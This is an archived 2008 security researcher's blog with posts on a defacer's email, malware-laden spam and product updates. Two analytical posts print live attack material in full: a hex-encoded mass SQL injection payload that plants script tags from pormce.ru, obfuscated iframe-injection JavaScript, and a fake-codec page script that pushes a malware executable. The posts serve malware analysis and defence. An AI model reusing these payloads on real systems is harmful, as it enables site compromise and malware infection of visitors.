Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 30 September 2008

cr4nk responds - OH NOEZ!

Alas poor skiddie, for thou shall be ridiculed! ..... On Tuesday 28th Sept, I sent the following to our dear cr4nk, as I was in a funny mood (I get like that occasionally) and fancied having a laugh. I never expected a response, but boy am I glad he did (it took a week, but he finally got there lol);

Dear cr4nk,
     I'd like to thank you for playing "how to be an unsuccessful skiddie" and giving me the opportunity to shut down your website (I really did enjoy doing that). Alas it would appear, you've still not learnt however so rest assured, we'll be following you until you stop attacking peoples servers.


One week later, and it seems whilst his spelling leaves alot to be desired, he did actually respond ..... and OH NOEZ! the "leet" skiddie (sorry "genius hacker" LOL!) is telling me to err - shut up?

well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


... and he must be feeling rather bold - he's not even bothered to try and disguise where his e-mail is coming from, lol.

Exported by: Outlook Export v0.1.2


From: cr4nk@land.ru
E-mail:cr4nk@land.ru [ 82.204.219.251 - pochta.ru ]
Date: 01/10/2008 00:47:01
Subject: Re: Woops
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <cr4nk@land.ru>
Delivered-To: services@[RM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-124.livemail.co.uk (Postfix) with SMTP id 8621B8A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from web22.pochta.ru (web22.pochta.ru [82.204.219.122])
by smtp-in-124.livemail.co.uk (Postfix) with ESMTP id 706378A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from [127.0.0.1] (helo=localhost)
by web22.pochta.ru ( sendmail 8.13.3/8.13.1) with esmtp id 1Kkovl-0001E7-RC
for services@[RM]; Wed, 01 Oct 2008 03:47:01 +0400
Message-ID: <20081001034701.dw3sqc7b40g4480g@www.pochta.ru>
Date: Wed, 01 Oct 2008 03:47:01 +0400
From: cr4nk@land.ru
To: Steven <services@[RM]>
Subject: Re: Woops
In-Reply-To: <00e301c920fc$a58cb800$0c00a8c0@THCP>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_69eh72h9ns00"
Content-Transfer-Encoding: 7bit
X-Mailer: Free mail service Pochta.ru; WebMail Client; Account:
cr4nk@land.ru
X-Proxy-IP: [84.187.66.163]
X-Originating-IP: [84.187.66.163]
X-Original-To: services@[RM]


Is it just me, or are these young kids getting too big for their boots? First PRMF thanks me for shutting down his site, swears a bit, then invites me to find and shut down the rest, and now this "d00d", with all of his self confessed "genius", can also only come up with a "shut up" and profanity.

I remember when skiddies actually had some cajones ..... But in the meantime, I'm happy to report, myself and some friends have been locating sites that have been "hacked" by cr4nk and his little group of nut jobs and have been getting them either shut down or cleaned (depending on the owner/hosting co).

If you've been a victim of cr4nk, feel free to drop him an e-mail and give him your thoughts - he seems to like it (but don't forget to report the attack to the authorities and/or your hosting company too).

/edit

Rofl, not long after posting this, he followed up with;

basstard u think u can stop us. we will hack the world man. so we are not some script kiddis we are writing our own exploits also shut up and FUCK YOU
Posted by MysteryFCM at 16:51
0 comments

AV's throwing virus warnings for the hpHosts blog and forums

This is a quick note for those of you seeing virus warnings for the hpHosts blog and forums. These are false positives, and are caused by the AV's detecting the malicious codes posted (obviously a good thing), but evidently not realising that they're not able to do any harm.

Avast, Avira and the developers of LinkScanner have been contacted. In the meantime, if it will make you feel safer (and indeed I'd recommend doing it anyway), disable scripts when visiting the blog/forums.

/edit

Whilst doing some testing, I've noticed Avira (what I've got) only flags it when the blog is loaded in Trident based shells such as Avant Browser/Internet Explorer (with or without scripts enabled) - it doesn't flag it when loaded in Opera.
Posted by MysteryFCM at 15:39
0 comments

Hex injection, they are persistent .......

If you've read this blog at all lately, you'll no doubt have read the previous blog entries I've made concerning this, and hillariously, they're still trying - evidently not realising their attempts aren't going to work.

The latest attempt comes from 201-92-227-227.dsl.telesp.net.br (IP: 201.92.227.227), and is in the same form as previously;

2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E706F726D63652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 0


The part we're interested in, as before, is the Hex between CAST( and %20AS%20VARCHAR (%20 is the space character, so this translates to AS VARCHAR). This code translates this time to;

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pormce.ru/script.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This shows us they've got another URL, pormce.ru. If we run this through vURL we see;

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}',58,58,'||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID||userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|toGMTString|3600|1000|update|expires|getTime|Date'.split('|'),0,{}))


Which is the usual obfuscation rubbish we're used to, and it's very easily decoded using Malzilla;

window.status="";n=navigator.userLanguage.toUpperCase();if((n!="ZH-CN")&&(n!=&undefined;ZH-MO")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!=&undefined;UR")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){var $a=document.cookie;var $b=$a.indexOf("cvbest=");if($b!=-1){}else{var $c=new Date();$c.setTime($c.getTime()+3*3600*1000);document.cookie="cvbest=update;expires="+$c.toGMTString();try{document.write("<iframe src=http://deryv.ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>")}catch(e){}}}


This shows us another URL, this time pointing to deryv.ru. This script contains two more scripts that I've not decoded yet, but they're very similar to the previous Asprox injections.
Posted by MysteryFCM at 15:05
0 comments

hpHosts - Updated September 30th, 2008

hpHOSTS - UPDATED September 30th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of [b]50,909[/b] listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 30/09/2008 21:30

  2. Last Verified: 30/09/2008 21:00
Download hpHosts now!
http://hosts-file.net/?s=Download
Posted by MysteryFCM at 13:20
0 comments

hpHosts - The largest removal to date!

I'm running the final pass validation for the latest release of hpHosts as I write this, and I've noticed something over the last week. When I started the validation process, there was around 4800 or so domains not resolving. Up to this current pass, thats been reduced to just over 4000. However, all of these have thus far, failed to resolve.

This makes it by far, the biggest removal to date for hpHosts. Whether this is directly connected to the Atrivo/Intercage/Est Domains farce is anyone's guess, but I'm betting it's certainly got alot to do with it.

The final pass should be done within the hour, and once those still not resolving are moved from the database, to a monitoring list, I'll begin the prep for the actual release itself - hopefully this should be out by 23:00 (approx 3 hours or so)

/edit

The final number removed is: 4075
Posted by MysteryFCM at 10:05
0 comments

Saturday, 27 September 2008

PRMF: 0, good guys: 1

Okay, so I don't have a really cool name like The Goddamn Batman, nor do I have a beat stick - but I do take a rather perverse pleasure none the less, in shutting down idiots that are stupid enough to ask on the WOT forums, if their sites rating can be changed to green instead of yellow.

I am of course, talking about PRMF, who in August, wrote (partial quote) in the WOT forums;

I know, this website have SPAM this forum, but the owner don´t know that, and says SORRY in name of all the comunity...
But it´s a safe forum... Why yellow?
Please,check this....


Two problems here, firstly, the person posting this IS the owner of the site in question so either he's talking about himself in the third person, or he thinks those in the WOT forums are stupid ...... sadly further on, we saw it was actually the latter, when after being shown some of the problems with his site, he wrote;

The section XXX is only available to users over 18 per registration, no child has access to the areas , and that comments is to try make my rating up... If they was wrong, i´m sorry and coul delete them? Thanks...

In prmf.realmsn.com/Parceiros-h1.htm its in big red letters that
"O PRMF Fórum não se responsabiliza pelo conteúdo de qualquer site em baixo. São da exclusiva responsabilidade de cada um dos seus autores"
in english:
"The PRMF Forum is not responsible for the content of any site below. They are the sole responsibility of each of its author"

then all those websites are not of my responsibility and I have nothing to do with it and her contents ...

Thanks you!

PRM


In this particular comment, he was referring to the malware I showed him he was linking to, and the XXX section of his site, that was (contrary to his claims), available to kids (more on this further on) - naughty naughty. Further to this, he stupidly admitted that he commented so many times, on his sites scorecard, in order to try and manipulate the sites rating - this isn't going to well so far, and it's about to get worse.

On September 1st, he proudly mentioned his XXX section was gone - and it was, so we focused on the other problem - his sites offering warez. Whilst researching his site a little more, I noticed an increasing issue with the account I was using. Mentioning this on the WOT forums, he claimed my account had not been deleted, but infact, had been put back into verification - then an e-mail from his site proved my original theory of his deleting my account, correct;

Translated version of the e-mail;

"You received this email autopilot because its account at "..::: PRMF Forum :::.." -- hxxp://prmf.realmsn.com has just been excluded.
To know precisely the reasons for exclusion, contact the administrator."

Original;

"Você recebeu este e-mail automatico porque a sua conta em "..::: PRMF Fórum :::.." - hxxp://prmf.realmsn.com acabou de ser excluída.
Para conhecer precisamente os motivos da exclusão, entre em contato com o administrador."


Woops? Way to look legit there - lock out the researcher. Unfortunately for this idiot, he obviously didn't realize that it simply takes a matter of milliseconds to create a new account.

On September 2nd, I decided to check his site again, and was surprised to find he'd re-included the XXX section (obviously he'd not gotten rid of it - just hidden it as all the content was still there). Mentioning this on the forums and further mentioning the fact his site was still offering warez, I was not surprised to note that to date - he's not been back. Evidently realizing that researchers aren't newbie's that can be fooled so easily.

On September 23rd, I decided to revisit the site to see what if anything, had changed. Sadly, it had only changed for the worse. His site was still offering warez, still allowing kids to access the porn section - and now made matters worse as I found a couple of the posts in the XXX section that were quite clearly child pornography.

Warez was bad enough, allowing kids to access porn is bad enough - but to allow your users to post what is blatantly underage porn is unforgivable - and not something I take lightly. I decided enough was enough and reported his site not only to MET (UK Police), but also to CEOP (Child Exploitation and Online Protection Centre) and the IWF (Internet Watch Foundation).

Further to this, I also reported his site to the company that provided his forums, their upstream provider, and their registrars. The reason I did not report this only to the company providing these forums is that in the past when I've done this, it's resulted in nothing being done. By taking a multi-pronge approach, it almost always guarantees someone is going to do something.

Thankfully my approach worked as checking the site again on September 27th, I was presented with the following notice;



Translated;



I didn't get a reply from anyone I reported the site to, and to be honest - I'm not bothered - something was done, that's the main thing.

References

Yellow?
http://www.mywot.com/en/forum/1486-yellow

PRMF.Realmsn.com Scorecard
http://www.mywot.com/en/scorecard/prmf.realmsn.com

Reporting Child Pornography

IWF (Internet Watch Foundation)
http://www.iwf.org.uk/reporting.htm

CEOP (Child Exploitation and Online Protection Centre)
http://www.ceop.gov.uk/ceop_report.aspx

National Center for Missing & Exploited Children
https://secure.missingkids.com/missingkids/servlet/CybertipServlet?LanguageCountry=en_US

International Agencies
http://vachss.com/help_text/report_child_porn_intl.html
Posted by MysteryFCM at 10:39
9 comments

Friday, 26 September 2008

Full Circle Magazine: Issue 17 is here!

I've been an avid reader of this since coming across is several releases ago, and am happy to say that the latest release is now available.

What is Full Circle Magazine?

Full Circle is a free, independent, magazine dedicated to the Ubuntu family of Linux operating systems.

Description courtesy of the FCM website, whilst mostly true, alot of the stuff in their magazines are actually applicable to other Linux distro's too :o), and whilst not mentioned, their magazines are provided in downloadable PDF

Whats in the latest release?
  1. Command and Conquer - Nano & Vim.
  2. How-To : Program in C - Part 1, Connect to IRC, Using GIMP - Part 6 and Scan & Convert to PDF.
  3. My Story - …When I Was Two
  4. My Opinion - Is This The Year?
  5. MOTU Interview - Harald Sitter
  6. Top 5 - Email Notifiers
Great!, where can I download it?

You can download the latest release at;

http://fullcirclemagazine.org/issue-17/

... and previous releases from;

http://fullcirclemagazine.org/downloads/

RSS Feed:
http://fullcirclemagazine.org/feed/
Posted by MysteryFCM at 17:34
0 comments

Bits from Bill: Vote2008 WinPatrol Discount Coupon

Like Bill, I'm no expert on politics either, but personally - I'd give every UK votizen the same discount just to vote out Labour if it had been me ......

Anywho, for those of you that don't have Winpatrol Plus yet (why not??????), Bill is offering a $10 discount (I'm not up on exchange rates, but I believe it's around £20) to those that purchase WinPatrol Plus until as Bill puts it;

.... a reasonable agreement is reached to prevent additional collapse in the financial market


I've absolutely no idea what that means or refers to as I don't follow UK politics let alone US politics, but I'm guessing that means something bad is happening?

Read Bills full post on this subject at;

Bits from Bill: Vote2008 WinPatrol Discount Coupon

If for some unknown reason (and it has to be unknown as I can't think of a single reason not to have it!) you don't actually have WinPatrol yet - GET IT!. You can download it for free (tis the non-PLUS version) from;

www.winpatrol.com
Posted by MysteryFCM at 15:44
0 comments

Amazing books! (HIDDENEXT/Worm.Gen and Troj/Agent-HTC)

There's two problems with these e-mails ..... firstly, I did not write a book, and secondly, even if I had, they're under the mis-conception that I can actually write good books LOL!

Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff. It's certainly this year's best in its genre. You seem to never going to quit surprising us. We have made a contract with you and guarantee that the first edition will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


The attachment (31K) is named approved.zip and contains a file named "approved.doc[MANY_SPACES].exe" and detection for it is rubbish;

http://www.virustotal.com/analisis/c4b44222d1d498c795f220989921693a


The e-mail in all of it's glory;

Subjects thus far:

Amazing Book
Excellent Book

Exported by: Outlook Export v0.1.2


From: Susana Hurley
E-mail:unwhchm@bostoncf.com [ - Invalid IP was passed to me ]
Date: 26/09/2008 16:18:01
Subject: Amazing Book
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff.
It's certainly this year's best in its genre. You seem to never going to
quit surprising us.
We have made a contract with you and guarantee that the first edition
will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank
you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Greating and felications Friend,<BR>
<BR>
Your new book has brought a lot of excitement to our editorial staff.<BR>
It's certainly this year's best in its genre. You seem to never going to<BR>
quit surprising us.<BR>
We have made a contract with you and guarantee that the first edition<BR>
will total at least 10 million copies.<BR>
<BR>
Enclosed is the approved and edited copy of your amazing book. Thank<BR>
you for this paragon of beauty.<BR>
<BR>
Please get in touch with us at your earliest convenience.<BR>
<BR>
Adios<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <unwhchm@bostoncf.com>
Delivered-To: services@[RMD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4FBE466E6E3
for <services@[RMD]>; Fri, 26 Sep 2008 16:18:03 +0100 (BST)
Received: from [163.153.27.216] (unknown [163.153.27.216])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id E685566E6D4
for <burnservices@[RMD]>; Fri, 26 Sep 2008 16:18:01 +0100 (BST)
Received: from [163.153.27.216] by mail.global.frontbridge.com; Fri, 26 Sep 2008 10:18:01 -0500
Date: Fri, 26 Sep 2008 10:18:01 -0500
From: "Susana Hurley" <unwhchm@bostoncf.com>
X-Mailer: The Bat! (v3.71.01) Professional
Reply-To: unwhchm@bostoncf.com
X-Priority: 3 (Normal)
Message-ID: <787369064.27570604130467@bostoncf.com>
To: burnservices@[RMD]
Subject: Amazing Book
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----------8401675F8425842C"
X-Original-To: burnservices@[RMD]
Posted by MysteryFCM at 09:16
0 comments

Royal Navy won't fight pirates 'in case they claim asylum'

Normally this wouldn't catch my attention, I couldn't care less about our armed forces - they've been a joke for a very long time (not their fault, it's those in charge we've got to blame), but this is just pathetic.

British Foreign Office officials are understood to have advised the Royal Navy not to confront or arrest pirates in the region for fear of transgressing human rights legislation or encouraging their seeking asylum once taken to the UK.


http://www.theregister.co.uk/2008/09/25/royal_navy_pirate_asylum_seekers/

My brothers in the Navy - think I'll see if I can get hold of him and ask about this. Personally, I think the Navy should tell those in charge to shove it, and blow the pirates out of the water - they couldn't care less about human rights, why should the Navy care about theirs?

In the meantime, the comments by Nick pretty much sum up my thoughts;

They used to say that a an Englishman could safely walk across the breadth of the British empire unprotected because no one dared provoke the armed forces. Maybe I should practice my French instead...
Posted by MysteryFCM at 06:23
0 comments

Kentucky (secretly) commandeers world's most popular gambling sites

I tend to agree with alot of the commenters to the article, that this has far reaching implications, and Kentucky shouldn't have been allowed to do this. However, I've also got a more important question - why didn't they go after the sites that actually infect people? That would've been a much better idea.

The state of Kentucky has seized control of some of the world's most popular gambling domain names courtesy of a state judge who issued a secret ruling last week ordering registrars to transfer 141 internet addresses to the state's top law enforcement official.

The order (PDF) by Franklin County Circuit Judge Thomas Wingate applies to sites including absolutepoker.com, goldenpalace.com, and ultimatebet.com. The websites, many of which are operated outside US borders, stand accused of illegally making their services available to Kentucky citizens. Already, whois records list goldencasino.com as the rightful property of J. Michael Brown, the Justice and Public Safety secretary who filed the lawsuit. At time of writing, goldencasino.com and the handful of other affected websites we checked appeared to be offering unfettered online gambling services.


Read the full article at El Reg;

http://www.theregister.co.uk/2008/09/26/gambling_domain_seizure/
Posted by MysteryFCM at 04:33
0 comments

Wednesday, 24 September 2008

Mylot.com codec infection madness!

Public profiles are a great way to tell people about yourself, just look at the hundreds of sites that offer such a feature. These features however, can be just as bad for the visitor. Take the following for example;



This profile, contains a lovely little link that takes you to;

http://superelectionpolls.info/Teens_Video.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/Teens_Video.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:08:48
*****************************************************************
<head>
<title> HOT VIDEO SENASTION ONLY HERE!!!</title>
<meta http-equiv="Content-Language" content="en-us" >
<meta name="robots" content="index, follow" >
<META NAME="Keywords" CONTENT="full on bush,george bush on obama"/>
<meta name="description" content="full on bush, nunn bush penny loafer, zshare jennifer bush, full on bush, bush ak20 television user manual, bush iraq troop reduction/">
<meta name="revisit-after" content="2 days">
<meta name="rating" content="general">
</head>
<p><IFRAME src="test.html" width="1200" height="1000"
scrolling="auto" frameborder="1">
</IFRAME>
</p>
<br>


As you can see, this loads an iFrame that then loads;

http://superelectionpolls.info/test.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/test.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:47:48
*****************************************************************
<html>
<head>
<title>
fastguidan.info
</title>
</head>
<BODY bgcolor="FFFFCC">
<script type="text/javascript" language="javascript">
eval(unescape("myvar1%3D5462%3B%0D%0Amyvar4%3Dmyvar1%3B%0D%0Aif%28myvar1%3D%3Dmyvar4%29%20document%2Elocation%3D%22http%3A%2F%2Falldebt%2Ebiz%2Fnewway%2Fin%2Ecgi%3F5%22%3B%0D%0A"));
</script>

</body>

</html>


This then loads the following little script;

eval(unescape("myvar1=5462;
myvar4=myvar1;
if(myvar1==myvar4) document.location="http://alldebt.biz/newway/in.cgi?5";
"));


Which as you can see, takes you to;

http://alldebt.biz/newway/in.cgi?5

.... which is where the fun begins. alldebt.biz, uses a 302 redirect;

HTTP/1.1 302 Found
Date: Wed, 24 Sep 2008 22:27:29 GMT
Server: Apache/1.3.36 (Unix) mod_fastcgi/2.4.2 PHP/5.1.4 FrontPage/5.0.2.2510
Set-Cookie: SL_5_0000=_5_; domain=alldebt.biz; path=/; expires=Thu, 25-Sep-2008 22:27:29 GMT
Location: http://theprivatetube.com/1/0/0/693/0/white/
Transfer-Encoding: chunked
Content-Type: text/html


Which as you can see, takes us to theprivatetube.com, which loads;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://alldebt.biz/newway/in.cgi?5
Server IP: 72.232.180.163 [ 163.180.232.72.static.reverse.ltdomains.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 5
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:49:38:49
*****************************************************************
<html>
<head>
<title>Free movies online</title>
<style>
#alertMessage {
background: #000000 url(/error.png) no-repeat scroll 0pt;
height: 129px;
visibility: hidden;
width: 384px;
z-index: 2;
position: absolute;
}

body {
background-color: white;
font-family:Tahoma;
align:center;
}
</style>
<script>

function simpleRedirect()
{
document.getElementById("alertMessage").style.visibility = "hidden";
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function openCodec()
{
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function alertInstall()
{
alert("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library.");
openCodec();
}

function askInstall()
{
if (confirm("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library."))
simpleRedirect();
else
alertInstall();
}

function hideAlert()
{
document.getElementById("alertMessage").style.visibility="hidden";
simpleRedirect();
}

function docLoad()
{
document.body.onbeforeunload="askInstall();return false";
}
</script>
<script src="/dnd.js"></script>
</head>
<body>
<div style="font:17px Tahoma;color:black;" align="center">

</div>
<div id="alertMessage" onmousedown="this.style.zIndex=10;StartDrag(event,this,PutBack)" name="errorMsg">
<div id="alertTitle"
style="position: relative; top: -14px; left: 360px; width: 20px; height: 20px; font-size: 14px; color: white; font-weight: bold; border: none"
onclick="hideAlert();">
<div style="display: none"> </div>
</div>
<div id="alertText"
style="position: relative; top: 20px; left: 60px; width: 300; font-size: 12px; font-name: Arial">
Windows Media Player cannot play the file. The Player does not support the format you are trying to play. Please install video codec update.</div>
<div id="alertButtons"
style="position: relative; top: 30px; left: 100px" /><input
type="button" onclick="simpleRedirect()"
value="  Ok  " /> <input type="button"
onclick="simpleRedirect();" value="  Cancel  " />
<input type="button" onclick="simpleRedirect()"
value="  Continue  " /></div>
</div>

<table width="100%" align="center" valign="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="center"><img src="/img/prev_1_0.png"
onclick="simpleRedirect();" style="border: 1px solid white" /></td>
</tr>
</table>
<script>
<!--
setTimeout("showAlert();", 1000);

function showAlert()
{
var p=document.getElementById("alertMessage");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-145;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
-->

</script>
</body>
</html>


This then loads a 187K executable;

http://theprivatetube.com/cd/693/0/wmcodec_update.exe

Which Avira kindly flagged for me .........



VT results for wmcodec_update.exe;

http://www.virustotal.com/analisis/fb970f590465d2da92b161aac1706893

Extraction of the executable failed whilst named .exe, so I tried renaming it to .zip (Universal Extractor identified it as a 7-zip file), and voila - I could extract it. The following is it's contents;


*****************************************************
Ur I.T. Mate Group Intranet
http://mysteryfcm.co.uk

This file has been generated by QFScript v1.0 Revision 3
Author: Steven Burn - Ur I.T. Mate Group owner
Homepage: www.it-mate.co.uk

File index for: mylot_com\alldebt_biz_-_theprivatetube_com
*****************************************************
DATE/TIME - MD5 - FILE/FOLDER
25/09/2008 04:03:30     d96fa963dbabb94bb60fc38ded67cc7f     alldebt_biz_-_theprivatetube_com
25/09/2008 04:04:20     21a7031dde9bdb27f07f5fcfa58bd905     alldebt_biz_-_theprivatetube_com\wmcodec_update.exe
25/09/2008 04:14:06     89f3c6308bce5f634dfc374499b3a1a9     alldebt_biz_-_theprivatetube_com\wmcodec_update
25/09/2008 04:14:10     825f37247eaef9006448dc5d0265aa29     alldebt_biz_-_theprivatetube_com\wmcodec_update\$R0
25/09/2008 04:16:16     4119d31ea7da45cf0d9a6f9961918038     alldebt_biz_-_theprivatetube_com\wmcodec_update\script.bin
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ýŠ€
25/09/2008 04:16:20     307f3492345535f4d6d5ce2637c8341b     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\ýŠ€
25/09/2008 04:16:20     5680520d33b4175681abf3138a5ecfd6     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\sx2_77000560.exe
25/09/2008 04:16:20     173ffeaf2e189bc76e476b255559b41a     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR
25/09/2008 04:16:20     8183cd31665faaf5a7d7f5fa4d54e57b     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR\System.dll
*****************************************************
3 folders, 7 files
*****************************************************


Sadly, detection for sx2_77000560.exe is rather pitiful, with only 2/36 actually detecting it;

http://www.virustotal.com/analisis/4df5fd8178baf3f313854d2839309eb5

The ýŠ€ and $R0 are all 0 byte files ........ Sadly, Universal Extractor, whilst again, identifying sx2_77000560.exe as a 7-zip file, could not actually extract it.

Looking through the wmcodec_update.exe executable shows some interesting content too. For example, it contains the following URL references;

http://meta38.com/service/index.php
http://linker15.cn/service/index.php



Both URL's return the same content;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://meta38.com/service/index.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:29:43:29
*****************************************************************
<root>
<serviceurls>
<serviceurl>http://meta38.com/service/index.php</serviceurl>
<serviceurl>http://linker15.cn/service/index.php</serviceurl>
</serviceurls>
<feedurls>
<feedurl>http://bestsearch3.com/feed/get.php</feedurl>
<feedurl>http://bestsearch4.com/feed/get.php</feedurl>
</feedurls>
</root>


bestsearch3.com and bestsearch4.com, both failed to return anything useful.

*****************************************************************
